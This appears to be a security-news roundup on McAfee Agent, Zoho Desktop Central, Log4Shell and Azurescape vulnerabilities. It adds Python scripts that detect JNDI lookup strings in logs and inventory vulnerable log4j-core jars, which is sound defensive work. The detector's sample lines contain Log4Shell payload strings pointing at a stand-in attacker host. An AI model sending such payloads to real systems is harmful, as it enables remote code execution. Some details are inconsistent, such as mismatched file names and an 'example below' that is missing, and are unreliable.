McAfee has recently patched two high-severity security bugs in its ePO agent component, one of which can allow attackers to achieve arbitrary code execution with SYSTEM privileges.
The Agent is the piece of McAfee ePolicy Orchestrator (McAfee ePO) that downloads and enforces policies and executes client-side tasks such as deployment and updating.
A command injection vulnerability in McAfee Agent (MA) for Windows prior to 5.7.5 allows local users to inject arbitrary shell code into the file cleanup.exe. The malicious clean.exe file is placed into the relevant folder and executed by running the McAfee Agent deployment feature located in the System Tree. An attacker may exploit the vulnerability to obtain a reverse shell, which can lead to privilege escalation to obtain root privileges.
By placing a specially-crafted openssl.cnf in a location used by McAfee Agent, an unprivileged user may be able to execute arbitrary code with SYSTEM privileges on a Windows system with the vulnerable McAfee Agent software installed.
A privilege escalation vulnerability exists in the McAfee Agent prior to 5.7.5. McAfee Agent uses openssl.cnf during the build process to specify the OPENSSLDIR variable as a subdirectory within the installation directory. A low-privilege user could create the missing subdirectories of that path, place a specially crafted malicious openssl.cnf there, and thereby execute arbitrary code with SYSTEM privileges.
Exploiting privilege-escalation bugs lets bad actors paw at information assets that should normally be locked safely away. Hackers can use these elevated privileges to steal confidential data, run administrative commands, read files from the file system and deploy malware, as well as to potentially evade detection during attacks.
To remediate this issue, customers should update the McAfee Agent to the MA 5.7.5 release.
Zoho’s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routine tasks such as installing patches, deploying software, and OS imaging and deployment.
Zoho’s comprehensive endpoint-management platform (Desktop Central) suffers from an authentication-bypass bug (CVE-2021-44757) that could lead to remote code execution.
What is the vulnerability?
CVE-2021-44757 - Zoho ManageEngine Desktop Central before 10.1.2137.9 and Desktop Central MSP before 10.1.2137.9 allow attackers to bypass authentication and read sensitive information or upload an arbitrary ZIP archive to the server.
What is the impact?
If exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary zip file on the server.
How to mitigate this?
This vulnerability was fixed on January 17, 2022, and the fix is available in the latest versions of Desktop Central and Desktop Central MSP. Please refer to the KB documents of Desktop Central and Desktop Central MSP for more details.
Recommendations - Follow the security guidelines below for Desktop Central and Desktop Central MSP to ensure all security controls are configured to keep your network secure.
1) Update your Desktop Central server to the latest build.
2) Grant access to the machine on which the Desktop Central server is installed only to authorized users.
3) Use proper firewall and anti-virus software and keep them up to date so that their alerts are accurate.
4) Delete unused accounts.
5) Audit and review privileged user access on a regular basis, at least every 3 months.
If you would like to reduce the security risks of unauthorised access and respond quickly to security incidents and data breaches, contact us for a free consultation today.
A zero-day vulnerability in the popular Java logging library log4j (version 2) was discovered that results in remote code execution (RCE) when a certain string is logged.
Given how ubiquitous the log4j library is, the impact is severe: exploitation gives full control of the server, and it is very easy to exploit.
This zero-day vulnerability is known in short as "Log4Shell".
A critical remote code execution vulnerability in the popular Apache Foundation Log4j library has been disclosed. It could allow an attacker to completely take control of an affected server. It can be leveraged in default configurations by an unauthenticated remote attacker to target applications that make use of the Log4j library. This vulnerability, tracked as CVE-2021-44228, received a CVSS severity score of a maximum 10.0, and is currently exploited in the wild by cyber attackers.
Apache Log4j 2 is a logging library designed to replace the original log4j 1.x package. It is often used in popular Java projects, such as Apache Struts 2 and Apache Solr.
This vulnerability exists in the JNDI component of the LDAP connector, which allows an attacker to have the application retrieve a payload (a malicious class file) from a remote server and execute it locally. Several proofs-of-concept and vulnerability walkthroughs have already been published. The flaw resides in the Java Naming and Directory Interface (JNDI) implementation and can be triggered using an LDAP request like the example below.
Discovery of the bug has been credited to Chen Zhaojun of Alibaba. It has been assigned the maximum CVSS score of 10, given how relatively easy it is to exploit, attackers’ ability to seize control of targeted servers, and the ubiquity of Log4j.
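Because the trigger is a lookup string that reaches Log4j through any logged field (request path, headers, user agent), the practical detection question for a defender is whether such strings appear in web server or application logs. The following is an added example, not code from the original post or from Apache: a small scanner that flags ${jndi:...} lookups in log lines, including ones hidden behind nested Log4j lookups, which it normalizes from the inside out before matching (the string Log4j acts on is the resolved one, so a detector that only greps for the literal "jndi" misses them). The sample log lines and the hostname attacker.example are constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (not from any real system): a normal request, a plain
# JNDI lookup string in the User-Agent field, two variants that hide "jndi" behind
# nested Log4j lookups, and a harmless non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - "GET /search?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Innermost ${...} lookup: a body that itself contains no further "${" or "}".
_INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the nesting has been flattened.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_passes: int = 20) -> str:
    """Collapse nested Log4j lookups (lower:, upper:, and ':-' default values) from the inside out.

    ${lower:J} -> j, ${::-n} -> n, ${env:MISSING:-d} -> d.  Lookups that cannot be resolved
    statically (for example ${jndi:...} or ${date:...}) are left untouched, so the loop
    terminates as soon as a pass changes nothing.
    """
    for _ in range(max_passes):
        changed = False

        def resolve(match: "re.Match") -> str:
            nonlocal changed
            body = match.group(1)
            key, _, rest = body.partition(":")
            if key.lower() == "lower":
                changed = True
                return rest.lower()
            if key.lower() == "upper":
                changed = True
                return rest.upper()
            if body.startswith("::-"):          # ${::-x}: empty key, default value "x"
                changed = True
                return body[3:]
            if ":-" in body:                    # ${anything:-default} falls back to "default"
                changed = True
                return body.rsplit(":-", 1)[1]
            return match.group(0)               # unresolvable: keep the lookup as written

        text = _INNERMOST_LOOKUP.sub(resolve, text)
        if not changed:
            break
    return text


def is_jndi_probe(line: str) -> bool:
    """True if the line contains a ${jndi:...} lookup, even when obfuscated by nesting."""
    return bool(_JNDI_LOOKUP.search(normalize_lookups(line)))


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, normalized line) for every line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI_LOOKUP.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, normalized in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {normalized}")
```

Run against the constructed sample, lines 2, 3 and 4 are reported and the `${date:yyyy}` line is not. The normalizer only resolves the lookup forms it can evaluate without a running JVM; anything else is kept literally so that the final `${jndi:` match is made on the same text Log4j would see.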
Because Log4j is included in a number of web applications and used by a variety of cloud services, the full scope of this vulnerability won’t be known for some time. However, at the time this blog post was published, some products and services that were confirmed to be vulnerable include:
Apache has released an updated version, Log4j 2.15.0. We encourage all customers to investigate their internal and third-party usage of Log4j for vulnerable configurations and take remediation actions. If you are uncertain or unable to determine whether your implementation is vulnerable, patch aggressively.
If updating is not possible, the Apache Foundation recommends the following mitigations:
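Investigating "internal and third-party usage of Log4j" in practice means inventorying every jar on a host, including log4j-core copies bundled inside application WAR/EAR files. The following is an added example, not code from the original post or from Apache: a scanner that opens each archive, reads the log4j-core version from its Maven pom.properties, checks whether the JndiLookup class is present, recurses into nested archives, and classifies the result against the fixed release named above (2.15.0, held in FIXED_VERSION so it can be raised to whatever your current baseline is). The build_sample_archive helper and the archives it produces are constructed fixtures that only mimic the layout of a real log4j-core jar.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, List, Optional

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# First fixed release named in the advisory above; raise this if your baseline is newer.
FIXED_VERSION = (2, 15, 0)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); pads to three components and ignores '-rc1' style suffixes."""
    nums = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        nums.append(int(m.group()))
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums[:3])


def classify(version: Optional[str], has_lookup: bool) -> str:
    """Map what was found inside one archive to a verdict."""
    if version is None:
        return "unknown-version" if has_lookup else "clean"
    if parse_version(version) >= FIXED_VERSION:
        return "patched"
    # Old log4j-core without JndiLookup.class: the class was removed, which Apache listed as a workaround.
    return "vulnerable" if has_lookup else "mitigated"


def inspect_archive(data: bytes, name: str, depth: int = 0, max_depth: int = 3) -> List[Dict]:
    """Inspect one archive, and archives nested inside it (e.g. WEB-INF/lib), for log4j-core."""
    findings: List[Dict] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip container, nothing to inspect
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_lookup = JNDI_LOOKUP_CLASS in names
        if version is not None or has_lookup:
            findings.append({"archive": name, "version": version,
                             "has_jndi_lookup": has_lookup,
                             "status": classify(version, has_lookup)})
        if depth < max_depth:
            for inner in sorted(names):
                if inner.lower().endswith(ARCHIVE_SUFFIXES):
                    findings.extend(inspect_archive(zf.read(inner), f"{name}!{inner}", depth + 1, max_depth))
    return findings


def scan_directory(root: str) -> List[Dict]:
    """Walk a directory tree and inspect every archive found under it."""
    findings: List[Dict] = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(inspect_archive(path.read_bytes(), str(path)))
    return findings


def build_sample_archive(version: Optional[str], include_lookup: bool,
                         nested: Optional[bytes] = None) -> bytes:
    """Constructed test fixture: a minimal zip mimicking the layout of log4j-core.jar (not a real jar)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PROPERTIES,
                        f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not real bytecode
        if nested is not None:
            zf.writestr("WEB-INF/lib/log4j-core.jar", nested)
    return buf.getvalue()


if __name__ == "__main__":
    old_core = build_sample_archive("2.14.1", True)
    webapp = build_sample_archive(None, False, nested=old_core)   # a WAR bundling the old jar
    for finding in inspect_archive(webapp, "app.war"):
        print(finding)
```

Point scan_directory at a deployment root to get one finding per embedded log4j-core, with the nested path recorded as `outer.war!WEB-INF/lib/inner.jar`. An "unknown-version" verdict (JndiLookup present but no pom.properties, which happens with shaded or repackaged builds) should be treated as vulnerable until proven otherwise, which is the "patch aggressively" advice above in code form.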
Organizations that don’t have an effective security tool to scan and monitor this vulnerability exploitation can sign up for a free trial of AlienVault USM.
Azure Container Instances (ACI) is Azure's Container-as-a-Service (CaaS) offering, enabling customers to run containers on Azure without managing the underlying servers. Unit 42 security researchers recently identified and disclosed critical security issues in ACI to Microsoft. A malicious Azure user could have exploited these issues to execute code on other users' containers, steal customer secrets and images deployed to the platform, and possibly abuse ACI's infrastructure for cryptomining. Researchers named the vulnerability “Azurescape” – the first cross-account container takeover in the public cloud.
Azurescape allowed malicious users to compromise the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. In summary, the Azurescape exploit worked like this, as demonstrated in this YouTube video:
Microsoft patched ACI shortly after the vulnerability was disclosed. There are no security alerts and no known cases of Azurescape being exploited in the wild. As a precautionary measure, if you run containers on ACI, we recommend revoking any privileged credentials that were deployed to the platform before Aug. 31, 2021, and checking their access logs for any irregularities.
The rapid acceleration of the shift to the cloud that has occurred in the past few years has made these platforms a prized target for malicious actors. While we’ve long been focused on identifying new cloud threats, discovery of the first cross-account container takeover underscores the importance of that effort. Sophisticated attackers may not be satisfied with targeting end users, and may expand their campaigns to the platforms themselves to increase impact and reach.
The best way to prevent cyber attacks on any cloud environment is to implement a comprehensive cloud native security platform such as Prisma Cloud, which is able to detect and mitigate malicious behaviour as well as identify vulnerabilities in cloud environments. Contact us to learn how we can secure your infrastructure, applications and data across hybrid and multi-cloud environments.